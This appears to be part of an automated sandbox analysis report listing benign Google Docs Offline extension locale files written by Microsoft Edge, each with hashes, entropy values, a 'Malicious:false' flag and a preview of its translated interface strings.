                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):994
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                                                                                            MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                                                                                            SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                                                                                            SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                                                                                            SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2091
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
                                                                                                                                                                                                                                                                                                                            MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                                                                                            SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                                                                                            SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                                                                                            SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2778
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                                                                                            MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                                                                                            SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                                                                                            SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                                                                                            SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1719
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                                                                                            MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                                                                                            SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                                                                                            SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                                                                                            SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):936
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                                                                            MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                                                                            SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                                                                            SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                                                                            SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):3830
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                                                                            MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                                                                            SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                                                                            SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                                                                            SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1898
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                                                                            MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                                                                            SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                                                                            SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                                                                            SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                                                                            MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                                                                            SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                                                                            SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                                                                            SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):851
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                            MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                            SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                            SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                            SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):878
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                                                                            MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                                                                            SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                                                                            SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                                                                            SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2766
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                                                            MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                                                            SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                                                            SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                                                            SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):978
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                                                            MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                                                            SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                                                            SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                                                            SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):907
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                                                            MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                                                            SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                                                            SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                                                            SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):914
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                                                            MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                                                            SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                                                            SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                                                            SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):937
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                                                            MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                                                            SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                                                            SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                                                            SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1337
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                                                            MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                                                            SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                                                            SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
